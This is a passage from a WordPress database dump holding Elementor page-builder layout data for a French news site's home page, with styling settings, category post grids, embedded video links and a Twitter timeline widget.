ght_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2306,747,'_elementor_version','0.4'),(2307,747,'_elementor_css','a:3:{s:4:\"time\";i:1509369413;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2308,748,'_elementor_edit_mode','builder'),(2309,748,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"i